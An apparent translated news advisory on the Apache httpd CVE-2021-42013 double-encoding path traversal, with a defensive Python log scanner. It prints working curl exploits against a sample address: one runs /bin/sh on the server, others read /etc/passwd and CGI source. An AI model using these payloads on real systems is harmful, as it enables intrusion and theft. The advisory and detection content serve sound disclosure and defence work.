Another vulnerability in Apache httpd that allows access outside the site's root directory

A new attack vector has been found for the Apache http server that remained unfixed in update 2.4.50 and allows access to files in areas outside the site's root directory. In addition, researchers have found a method that, in the presence of certain non-standard settings, allows not only reading system files but also executing their own code remotely on the server. The problem appears only in releases 2.4.49 and 2.4.50; earlier versions are not affected. To eliminate the new vulnerability, Apache httpd 2.4.51 was promptly released.

At its core, the new problem (CVE-2021-42013) is the same as the original vulnerability (CVE-2021-41773) in 2.4.49; the only difference is how the ".." characters are encoded. Specifically, release 2.4.50 blocked the use of the sequence "%2e" to encode a dot, but missed the possibility of double encoding: given the sequence "%%32%65", the server decoded it to "%2e" and then to ".", so the "../" characters for moving to the parent directory could be encoded as ".%%32%65/".
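The double decoding described above is also what a review of access logs can key on: decode each request path repeatedly until it stops changing, and note how many passes it took for a ".." segment to appear. The following Python sketch is an added example, not code from the original article or from the Apache project; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request target in a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_rounds(target, max_rounds=5):
    """Percent-decode until stable; return (decoded, passes that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(target)
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds

def classify(target):
    """Label a request target by how a '..' segment was hidden, if at all."""
    path = target.split("?", 1)[0]
    if ".." in path.split("/"):
        return "plain-traversal"
    decoded, rounds = decode_rounds(path)
    if ".." not in decoded.split("/"):
        return "clean"
    # One pass is the %2e form (CVE-2021-41773); two or more passes is the
    # nested form that 2.4.50 missed (CVE-2021-42013).
    return "encoded-traversal" if rounds == 1 else "double-encoded-traversal"

def scan(lines):
    """Yield (line_number, label, target) for every suspicious log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and (label := classify(match.group(1))) != "clean":
            yield number, label, match.group(1)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
    '198.51.100.7 - - [08/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1024',
    '198.51.100.7 - - [08/Oct/2021:10:00:04 +0000] "GET /docs/100%25-guide.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, label, target in scan(SAMPLE_LOG):
        print(f"line {number}: {label}: {target}")
```

The last sample line shows why the check looks at the decoded path segments rather than at the mere presence of "%25" or "%%": a legitimately encoded percent sign decodes once and yields no ".." segment.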

As for exploiting the vulnerability to execute code, this is possible when mod_cgi is enabled and a base path is used in which execution of CGI scripts is allowed (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). A further mandatory requirement for a successful attack is that access to directories with executable files, such as /bin, or to the file system root "/" is explicitly granted in the Apache settings. Since such access is not usually granted, code execution attacks have little application to real systems.

At the same time, the attack that obtains the contents of arbitrary system files and the source code of web scripts, readable by the user under which the http server is running, remains relevant. To carry out such an attack, it is enough for the site to have a directory configured with the "Alias" or "ScriptAlias" directives (DocumentRoot is not enough), such as "cgi-bin".

An example of an exploit that allows you to run the "id" utility on the server:

    curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

    uid=1(daemon) gid=1(daemon) groups=1(daemon)

An example of an exploit that allows you to display the contents of /etc/passwd and of one of the web scripts (to output the script source, a directory defined through the "Alias" directive, for which script execution is not enabled, must be specified as the base directory):

    curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apache2/cgi-bin/test.cgi'

The problem mainly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem does not occur if access to directories is explicitly denied with the "require all denied" setting.

Source: opennet.ru
